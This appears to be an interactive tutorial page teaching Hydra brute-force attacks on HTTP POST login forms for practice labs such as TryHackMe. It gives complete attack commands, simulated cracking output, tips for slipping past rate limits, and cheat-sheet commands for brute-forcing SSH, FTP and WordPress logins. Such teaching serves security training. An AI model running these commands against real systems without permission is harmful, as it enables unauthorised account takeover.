Hydra HTTP POST Form Attack - Interactive Learning Lab

📚 Part 1: Understanding the Basics

1What is Hydra?

Hydra is a brute-force tool that tries multiple username/password combinations rapidly to crack login systems.

💡 Think of it like: A robot trying thousands of keys on a lock until one fits!

2What is HTTP POST Form?

When you login to a website, your browser sends a POST request containing your username and password.

You Type
Username: admin
Password: 123456

→

Browser Sends
POST Request
to Server

→

Server Says
✓ Success!
or
✗ Failed

3How Hydra Mimics This

Hydra pretends to be a browser and sends hundreds/thousands of POST requests automatically!

Attempt 1: admin:password → Failed ✗

Attempt 2: admin:123456 → Failed ✗

Attempt 3: admin:letmein → Failed ✗

Attempt 4: admin:welcome → Failed ✗

Attempt 5: admin:admin123 → Failed ✗

Attempt 6: admin:password123 → SUCCESS! ✓

Found valid password: password123

🎮 Part 2: Live Login Form Demo

⚠️ This is your target! Try logging in manually first to understand what Hydra will attack.

🔐 Admin Login Portal

Test credentials to see success/failure messages

⚠️ Username or password incorrect

✓ Welcome back, admin! Login successful.

🔑 Secret Credentials:
Username: admin
Password: password123

🔍 What Did You Notice?

When login FAILS: You see "Username or password incorrect"

When login SUCCEEDS: You see "Welcome back"

💡 Key Learning: Hydra needs to know what "failure" looks like so it can detect when it finds the right password!

🔎 Part 3: Reconnaissance - Gathering Information

Before attacking with Hydra, we need to collect 3 critical pieces of information:

1Step 1: Find the Form Path

Where does the form submit to?

<form method="POST" action="/login.php">
    ...
</form>
                

📍 Form Path Found: /login.php

2Step 2: Find the Field Names

What are the input field names in the HTML?

<input type="text" name="username">
<input type="password" name="password">
                

📝 Field Names Found:
Username field: username
Password field: password

3Step 3: Find the Failure Message

What text appears when login fails? Try wrong credentials and look!

❌ Failure Message Found: Username or password incorrect
We can use ANY part of this: "incorrect", "Username", "password", etc.

✅ Reconnaissance Complete! Now we have everything needed to build our Hydra command.

⚙️ Part 4: Building the Hydra Command

1The Basic Syntax

Every Hydra HTTP POST attack follows this structure:

hydra [OPTIONS] TARGET http-post-form "PATH:POST_DATA:FAIL_CONDITION"

2Understanding Each Switch/Option

Switch	Purpose	Example
`-l`	Single login name	`-l admin`
`-L`	Login name LIST from file	`-L users.txt`
`-p`	Single password	`-p secret123`
`-P`	Password LIST from file	`-P passwords.txt`
`-s`	Port number (if not 80)	`-s 8000`
`-V`	Verbose (show all attempts)	`-V`
`-t`	Number of parallel tasks	`-t 16`
`-f`	Stop after first found	`-f`

💡 Remember:
• Lowercase = single value (-l, -p)
• Uppercase = list/file (-L, -P)

3Understanding Placeholders

Hydra uses special placeholders to know where to insert usernames and passwords:

Placeholder	What It Does	Example
`^USER^`	Replaced with username from your list	`username=^USER^` becomes `username=admin`
`^PASS^`	Replaced with password from your list	`password=^PASS^` becomes `password=123456`

📌 How Placeholders Work:

Your command: username=^USER^&password=^PASS^

Hydra tries:
1. username=admin&password=password
2. username=admin&password=123456
3. username=admin&password=letmein
And so on...

4The Three-Part Specification

The most important part: "PATH:POST_DATA:FAIL_CONDITION"

Part 1: /login.php

↳ The path where the form submits

Part 2: username=^USER^&password=^PASS^

↳ The POST data with placeholders

• username = the form field name

• ^USER^ = where Hydra puts the username

• password = the form field name

• ^PASS^ = where Hydra puts the password

Part 3: F=incorrect

↳ How to detect failure

• F= means "look for this text on failure"

• incorrect = part of the error message

• Could also use: F=Username or F=password

⚠️ Important: The three parts MUST be separated by colons (:) and wrapped in quotes!

🚀 Part 5: The Complete Attack Command

1Putting It All Together

Using everything we learned, here's the complete command:

hydra -l admin -P passwords.txt localhost -s 8000 http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V
                

🔍 Command Breakdown - Line by Line:

hydra

↳ The tool we're running

-l admin

↳ Try the username "admin"

• -l = lowercase L for single Login

• admin = the username to try

-P passwords.txt

↳ Try all passwords from this file

• -P = uppercase P for Password list

• passwords.txt = file with password wordlist

localhost

↳ The target server address

• Could be: localhost, 192.168.1.100, example.com, etc.

-s 8000

↳ Connect to port 8000

• -s = specify port (optional, default is 80)

• 8000 = the port number

http-post-form

↳ The attack type

• Tells Hydra we're attacking a web form using POST

"/login.php:username=^USER^&password=^PASS^:F=incorrect"

↳ The three-part specification (in quotes!)

• Part 1: /login.php (form path)

• Part 2: username=^USER^&password=^PASS^ (POST data)

• Part 3: F=incorrect (failure detection)

-V

↳ Verbose mode - show all attempts

• Shows each username/password combo being tried

• Great for learning and debugging!

2Alternative Command Examples

Example 1: Try both username and password lists

hydra -L users.txt -P passwords.txt localhost -s 8000 http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V
                

Note: Now using -L (uppercase) for username list!

Example 2: Speed it up with more threads

hydra -l admin -P passwords.txt localhost -s 8000 http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V -t 16
                

The -t 16 uses 16 parallel connections (default is 4)

Example 3: Stop after finding first match

hydra -l admin -P passwords.txt localhost -s 8000 http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V -f
                

The -f flag stops immediately after finding valid credentials

Example 4: Standard web server (port 80)

hydra -l admin -P passwords.txt example.com http-post-form "/admin/login:user=^USER^&pass=^PASS^:F=failed" -V
                

No -s needed when using default port 80

📊 Part 6: Understanding Hydra's Output

1What You'll See When Running

---

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-18 10:30:15

[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:1/p:10), ~1 try per task

[DATA] attacking http-post-form://localhost:8000/login.php:username=^USER^&password=^PASS^:F=incorrect

---

[ATTEMPT] target localhost - login "admin" - pass "admin"

[ATTEMPT] target localhost - login "admin" - pass "password"

[ATTEMPT] target localhost - login "admin" - pass "123456"

[ATTEMPT] target localhost - login "admin" - pass "letmein"

[ATTEMPT] target localhost - login "admin" - pass "welcome"

[ATTEMPT] target localhost - login "admin" - pass "admin123"

[8000][http-post-form] host: localhost login: admin password: password123

[STATUS] attack finished for localhost (waiting for children to complete tests)

1 of 1 target successfully completed, 1 valid password found

---

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-18 10:30:18

2Breaking Down the Output

Output Line	What It Means
`[DATA] max 10 tasks...`	How many parallel attempts Hydra will make
`[DATA] attacking http-post-form://...`	Shows exactly what Hydra is attacking
`[ATTEMPT] target localhost - login "admin" - pass "admin"`	Shows each username/password combination being tried
`[8000][http-post-form] host: localhost login: admin password: password123`	SUCCESS! Valid credentials found
`1 valid password found`	Summary: Attack successful, found 1 valid password

🎉 Success! Hydra found valid credentials: admin:password123

3What If Nothing Is Found?

[ATTEMPT] target localhost - login "admin" - pass "admin"

[ATTEMPT] target localhost - login "admin" - pass "password"

[ATTEMPT] target localhost - login "admin" - pass "123456"

[STATUS] attack finished for localhost (waiting for children to complete tests)

0 of 1 target successfully completed, 0 valid passwords found

❌ No Match Found
This means:
• The correct password wasn't in your wordlist
• The username might be wrong
• Your fail condition might be incorrect
• Check your command syntax!

🔧 Part 7: Common Problems & Solutions

Problem 1: "No valid passwords found" but you know it's correct

Solution: Your fail condition is probably wrong!

What to check:

Make sure the fail text actually appears on the error page
Try a different part of the error message: F=Username or F=password
Check for typos in your fail condition

Test your fail condition:

# Try with just part of the error message
F=incorrect    ← Good
F=Username     ← Also good
F=Username or password incorrect  ← Too long, avoid
                

Problem 2: Wrong POST data field names

Solution: Double-check the actual HTML field names!

Common mistakes:

# Wrong - assuming generic names
username=^USER^&password=^PASS^

# Check the actual HTML:
<input name="user">        ← It's "user" not "username"!
<input name="pwd">         ← It's "pwd" not "password"!

# Correct command:
user=^USER^&pwd=^PASS^
                

Problem 3: Connection refused

Solutions:

✓ Is your web server running? Check with: php -S localhost:8000
✓ Are you using the correct port? Check the -s flag
✓ Can you access the page in your browser first?

Problem 4: Hydra too slow

Solution: Increase parallel tasks!

# Default (slow)
hydra -l admin -P passwords.txt ...

# Faster - use 16 threads
hydra -l admin -P passwords.txt ... -t 16

# Even faster - use 32 threads
hydra -l admin -P passwords.txt ... -t 32
                

⚠️ Be careful! Too many threads can crash the target or get you blocked!

Problem 5: Getting blocked/rate limited

Solutions:

Reduce threads: -t 4 (slower but stealthier)
Add delays: -w 2 (2-second wait between attempts)
This is common on real websites - practice labs don't usually have this

🎓 Part 8: Practice Exercises

1Exercise: Change the Field Names

Modify the login form to use different field names and update your Hydra command.

Challenge: If the form used these field names:

<input name="user_login">
<input name="user_password">
                    

What would your POST data be?

user_login=^USER^&user_password=^PASS^

2Exercise: Try Different Usernames

Create a username list and try multiple usernames:

# Create users.txt
echo "admin" > users.txt
echo "root" >> users.txt
echo "administrator" >> users.txt

# Update command to use -L instead of -l
hydra -L users.txt -P passwords.txt localhost -s 8000 http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V
                

3Exercise: TryHackMe Application

Apply what you learned to a real THM scenario:

Scenario: You're attacking a TryHackMe box at 10.10.10.10
• You found a login at /admin/login
• Field names are: loginUsername and loginPassword
• Error message says: "Authentication failed"
• Known username: molly

Your command should be:

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/admin/login:loginUsername=^USER^&loginPassword=^PASS^:F=Authentication failed" -V -t 64
                    

📝 Part 9: Quick Reference Cheat Sheet

Essential Switches

`-l username`	Single username
`-L file.txt`	Username list
`-p password`	Single password
`-P file.txt`	Password list
`-s PORT`	Specify port
`-V`	Verbose mode
`-t NUM`	Parallel tasks
`-f`	Stop after first find
`-w SEC`	Wait time between attempts

Command Template

hydra -l USERNAME -P WORDLIST TARGET -s PORT http-post-form "PATH:FIELD1=^USER^&FIELD2=^PASS^:F=ERROR_TEXT" -V
                

Real-World Examples

SSH Brute Force:

hydra -l root -P passwords.txt ssh://10.10.10.10

FTP Brute Force:

hydra -l admin -P passwords.txt ftp://10.10.10.10

HTTP Basic Auth:

hydra -l admin -P passwords.txt 10.10.10.10 http-get /admin

WordPress Login:

hydra -l admin -P passwords.txt 10.10.10.10 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=incorrect" -V
                

🎯 Part 10: Key Takeaways

✓ What You Learned:

Hydra mimics browser login attempts - It sends POST requests automatically
Reconnaissance is critical - You need: form path, field names, and failure message
Placeholders are key - ^USER^ and ^PASS^ tell Hydra where to insert credentials
The three-part spec - PATH:POST_DATA:FAIL_CONDITION must be correct
Switches matter - Lowercase (-l, -p) for single, Uppercase (-L, -P) for lists
Verbose mode helps - Always use -V when learning or debugging
Start slow, then optimize - Test first, then add -t for speed

⚠️ Remember:

Only use on systems you own or have permission to test
TryHackMe and HackTheBox are legal practice environments
Unauthorized access is illegal - Always get written permission
Be ethical - These skills are for security testing, not attacks

📚 Next Steps:

Practice on TryHackMe rooms: "Brute It", "Overpass", "Bounty Hacker"
Learn about rate limiting and WAF bypass techniques
Study wordlist creation and password patterns
Explore other Hydra modules: SSH, RDP, SMB, etc.
Learn complementary tools: Burp Suite, Medusa, Ncrack

🎯 Hydra HTTP POST Form Attack